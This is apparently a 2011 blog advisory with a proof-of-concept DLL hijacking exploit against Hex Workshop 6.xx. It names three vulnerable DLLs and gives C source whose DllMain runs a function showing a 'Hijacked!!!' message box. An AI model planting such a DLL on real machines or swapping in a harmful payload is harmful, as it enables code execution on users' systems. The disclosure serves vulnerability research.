HexWorkshop <= 6.xx Insecure Library Loading Vulnerability

============ { Advisory 09/01/2011 } =============

/*

PoC Title: Hex Workshop Insecure Library Loading Vulnerability (pe932d.dll,pe936d.dll,pegrc32d.dll)
Software Link:: http://www.bpsoft.com
Tested on: Windows xp sp3 x32

*/
#include <windows.h>

BOOL WINAPI DllMain (

HANDLE    hinstDLL,

DWORD     fdwReason,

LPVOID    lpvReserved

)

{

switch (fdwReason)

{

case DLL_PROCESS_ATTACH:

exploit();

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;    }

return TRUE;}

int exploit()

{

MessageBox(0, “Hijacked!!!”, “DLL Message”, MB_OK);

}

/*

Credits:

# Discoverd By: Locu

# Website: https://xlocux.wordpress.com

# Contacts: xlocux[-at-]gmail.com

*/

================== { EOF } =====================

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s